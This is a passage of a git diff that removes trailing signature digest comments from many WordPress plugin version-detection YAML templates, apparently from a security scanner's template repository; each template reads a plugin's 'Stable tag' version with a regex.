a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e91883da47f7b783eed4b2cc14a58f15ab7714764a292fc1cdc057640edbcf0602210092612014c1ee199648d23028aa6f92c0c34ceeda02900e65e46a4b50cd86ba9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 0af454195e7..41f7a0075e3 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dcc43d88643f8c9d614a760bf1919c479b3f69a2179d492288faefb795bdd22402210096c9168aa1c5c0773bd4b758cec36d4fbffcbc2cbbb014cd06009b6e14751d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 148f97cd5ec..7e35a3fb4fa 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f370f8f7cf88c50ee2acc5188cdf10ca4891a0a20c1b7d60753dc3ee4bfa462e022100e3a44b31f0fd4bfb3675a312d5bc0b11e6e8f90c0d2d956a426a97ac66c51a17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index bb11fec1377..18c2a7586e9 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206edb9723c6736bad572e1c5360615a93320e691413e9515b391edb45973eddb6022000f0e03f549876c3f36efa4b7f20f8d81d858aa7ab11246a6ef236d4f5b71ffe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 9eb1bbd251c..6bc2aa78f96 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a3e9ecf3d5cc2438b711a2d55747bd18ca4d10dcaefad2123a5e1e0febcaa1d902210091d4e2b992635058d2bc52a49d13a39aa68cc0f9e3770b183579c8e01e0e8028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 055d7399455..a43d3352a27 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008df0b9637988b2ab8f8d98d23ee5f15e8970140d0bcf23e6150912a6ff76d533022100e3f8e930a97a4290cc007582db84e8459b4bdfe2777524854c6dce582068c8e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 3a45c0b193e..e7db9944e45 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022021626dcf6f52ef9e814ee61767b5baf01dee0eabd067f8f48d1bab2afe1c20ed022100d7895237b2a47affc4115b4bb4f0705dc2e9ea973bddec578296120ed7ed671b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index aed4a934ee3..268bd7b9dfa 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100966c15190ba008645b9019526dbdd9df09ccc78c3d64529f1a022ce38eafc826022100c2c4809e823459bba3778383b01632d2762355d55cfb8fbc0b4b6b7ef3be6dc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 3250ef47d9b..d7fb2209d19 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207dcad544fd9dc7d1663df4fbf9c120830b8d4a1161786308a7187da17b3e7ea5022100932cf6ae9074472c3da6da92b46247f39e0a1c4ab6780ef431ddedada2f2c4bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index aff44975320..a1641d46328 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203a92b364b5e52179749c7232e5187811e866afa207a9880725372aab43a64f2e022050a74d7acdd258f6ae794166880d3293d644e5f6a8f0a7f6b99305a885b88f98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index f0a9533e99e..3b6542683c7 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd95b9d84c84a115f57fd3c640aa52896eb1cc4be9f1e0319ccc5a984df8cc350221008ba18a3eee85b1d8d8925970e6954b331f90f1e03c321f81acf36f11e65d2772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c50f1dfef68..969c280ee17 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022071b4bedecd6530615826e9c4a9734d2ac6a68749a27edbb22407500fc3b253f0022100904171720044e1b5110d7e5e27127c6736d057e80252e149d0b651fd72bf73b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 0b88e11302c..1c97c422e41 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022076f0936e725f9b1ea28840a0fa160cecfd8acbfdb18604c2a652d8b14b2e1289022003a25e9f99bbf1751db251cab7d9a70f5058c0102d1075af845a00fee437afb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index bce45dcf4cf..7d861cf06a1 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f3a1061169bae8aabf01fadf564f2ef14c69ce62718e5d8bcaadfcd790cea88022100f0bca5c057ae41f26a97782bff34d9419637e1067732acc43aab227370457968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index de14040cb20..00eb1e2dfcf 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022077f2c6b329a1829a592c0a921a6be85478cec39f70f91c9d6795ed076583bddf022100c7f2fbde20826fee9aa6308af2951876368f2f1f16ac42da8408129207d19da5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index e31a857cf93..f089ee37d31 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fc4c408d0c470f2c0584675823601449e09ad8dc8a4e3f2a0ba5ed97d9b4582202207965b6406523598b55adb0d9660523afa68badbb2b847f215caca92e8d1563ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 45aa5c5b44b..492d66db688 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100df714e2f6fa99d2d355e2e8b28c9e23e40f28ee99192892062df1aeec19e7512022031c4472a3357e6df3eec13baaa1216ee30c1d7877f475abcbbe9ecf090d191b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 1542f010673..f8903fa3dbb 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c4339f08194f73802002eda26605bea1b9e09387a4b017a2e7a2921d281978a20221009f40ed1a260eb57932a0944f9d685261130e5afbf58ca90817d4e246ace0056f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ff09e5c7005..ae2451ca381 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b908f6d4cb6b93291846fa49e4a0c406d1584b5b7a12238ae2ebdb0acbef8b5f022043984594cc8b60dfac64084f7a8294f734e679f49bcb7f4970b2294b045154d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index beb9e35c46e..dcc61d1255b 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097b90758079ab8c6fb09b7e30eeeed631ea9d53c660e9896e0d79956e399cf6b022100c26421ebf9d2eac8776858caa514995a0a772e6fdb22956035f08c538b017274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 145f74d806f..d1d2c1c1d00 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201782cd0bcce9c13db5a6e38fb63a2c8c30957e14b8fdb436646791e5e6b30f43022100c66000f799106d297c5a71c039de882f53496b7b313f5d8a6cdcf26623e07fcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 21e0f12172c..5f5e8afed51 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203ced6507644a1bb1a3ce94f51d9aa92aebe82d0b0a7225ee4e9a9df3df8f2f52022019cb1aecb38e12b262a40dbf925a40be2bd87199cb2e354a0d6c7993576e20dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 0bf4b84c030..d15634bb2b1 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008324d7faa71aa472057417dc474260f265f20357dd69dba0d2f1228b9462e2b1022100c7fe50abc194761459b64c1a8eb0ed6928438b6486af1e6713c3d64c0d786136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 80d8311ead2..7da04be5d3e 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050bfdc1b016abc6519b737a378b68ae4d78933364843ec94406928bb430c1b5e0220240d1ed79216fd1be6dd606a5a252aa70886b73314c188e95e57b93eee1899ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 73d41f32dbf..a79253cec50 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207df2ea69921422bbcc246cbff12e6293bd0a8cbe7f5dd61c0f404f079607edfc022072594547f6ad0aca0198c2f86f697e8120fd58ecd0caa591d69a6ef6d5558f0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1229827cfd4..77fc04a2203 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d97c992eb9410757cd5d1e81fd7bf4ee6f2fe82b89e12844015ec1a06766c0a022100b21529671646d72ee8769de037b09eaf4ff742375647ae6f158fa9948862412d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index f599994dae3..733f9ee453e 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b04479c8595017899c73fbed5c03eea505c936597e59fb2fcdb8a97af3369c65022059df2cf156cc95b39288c05d3c14dee05bd15681c09f8d30c9f5c8a1daa052fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 39aa2fb08fd..0af08f0ac08 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c74ccc5358f149659a1816595c1a79b07b4fcbd585fd70c9840dc7cbb34ad9ae02206f812796c9733931133948b54386a649108fe4e58429775356f2499ca5d85712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index d8ed3f78133..1e4c77fbca9 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202fb97129128d726c94715aef7e5efd013433124315869ad1cb5cdacda8bfca5f022075462e0f14e87fa195e863c1ac0f04a63a8aa53110b38f8b004bb91a0b6699d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index ead4854fde0..295e3fe82db 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f43d2e1c81f05974354bec07fbd1d61d933f905c9d7051c59d4a8c452441b98b022100c06f381b88f9d87d8f3b38fc8a3f36a4b7912bd58f13a848404e8521600982b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 2805bfe423c..862f73201fc 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220690aa22de841a4565f23ad67b72195ca0de1237e81ec519379a8069460729972022100a8291c18d0c74465e39fe9cddf26619526840860906f233c45dea68344fd807b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 1b3bc4df127..711b64f9d07 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e00f49de3fe478b66164964365341fb2b2256a904a4ecb21ad513b2750b0756022016ec06b4bee3cc6aafe99b2db3a13b64646892425aff62b95f6bfb37d4040867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index bb881e8a287..58ddcfab78a 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022075b73febe3ff06b6dcfed643eeda968d823133773467fefc27fcbbb88259b16302206c39309afe06b47257035b29cd125b685b04c6f174c31f4adfdcaf4c3ecb6378:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 232867c6b96..305d74e8eaf 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e439512a6c35734283e67741a6bc01e441ce457874b7b98a37414c0a360cce702206c6cf039f22bebc62105b30721442279f4b522cb139e4b8f2d700723349effcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index ce12a988162..668162fc4e1 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dec77d93d33b0a592c62a934e3936dffea8f0d1e89bbfb2f4d1253779d1aa50e0221009b5518a10a1daa440474c56b7c462f521b6626d871e927390d2612644bdff27b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index c90a854e693..2a233f389dc 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022035f9d095c41ab0d3f391683467a9c53b0de3497ad1f103125ab9fb828a414ed402207eb9f16a123ee750d831cc552aa11412e8377dff1423f35e9d3d4d1a392b2ccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a7a9fdb63e4..a0d2554492c 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205be3383cb9b084dabb44062477a21b97b64d50cc76947372c0ce9d60b3887da7022070838964786011f26a7ed2b2ea742a5e29c7f143043a9c2e48bfaa09be41de5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index c877300883c..4e5046273d1 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a5ff37e5fac7f4153b6131ccaf8f898ac9386a1f62745b9c26c1ca22e28b8c30220302d51df30e2751e88c0c735cd6ccb051ee929335b6d7c24f213bc73844610f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 088efba661b..f44cee79807 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202f8ec2ca8016d6dea0634ee3fa96ff19653ef8f3d1019d7c882552b0de94275c02200df039c05ef42d3513b1b242034a248500e383f05791fee65a74df7b0cf10883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 46a0e7d242c..39130db767b 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100de54cca0eccf4bb140e00add1fe63235a58943aaf474dc8b8fe1005c29add71c02210093e5d4d4c308fb1e43dfe8fe3bd1e7fdddf40382821169f5da970a72ac5d491c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 4f623eaf831..39c497073ca 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008ac5b8c4179b99fdd4271b843f399a806a35f3e77d5b04c7b46edec7a0f4053002200f04088b4685817032203dca46b687f09695cb20bfa37420525ae9eb1368be55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index d5f2718f375..b848288b55f 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b4c34d6656e1c2ccd81d870fe427361464c31c16d393bbbf66c85b35c5f3117a022100a64998adc291eaecb67f5646a46844c83e2aa06fdd43acff23b2331af721a864:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index de2fe498322..4d10178692e 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220753036e03aaa3dbe280f639079177fbe1b66e127da51ff615527213bdd4a1205022033d383b372734518f3defaff78b602917ed2f3af822a4f7350c924d3d1713039:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index cb5ad6b3a17..7aac0a153f3 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201f8f82bf5febba8e2db86a845827134673b9ba9d8e795c21b9ef8644612d9900022044c4a42d70041e93c64bdbd68bde4e830400287f92c91f31b709f83ff02e4686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index f22a7e6a3e0..d0cebd5316c 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220300b2ba420748fb85320956e1f97669e6712a8ba8f8a84a0599128a251cb9876022100c14cc3f1d4e2b7df9f1e5bf9c175a7f743082fa21fc59b0dcba059c0a247d04f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index b84ff9ef201..ff207791572 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205cfd3b23045537e657f15d845eb6545268da64e22c76c8093351ff34b8389a6b022100d977fa68d216ca750a10c57f511b392accff36b62b67e12211558b621212da78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fb1672e1f67..fffdc7d017a 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022006cdf48c3b9568b507ec3274c276e12cc65badbcd98e94ba8ed232342dbb2a15022100cfadbdc5cb4b43fc973319092b425ece6b0157a075c0f2127848e4b4db6414b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 241b665891e..7a9746a70d5 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 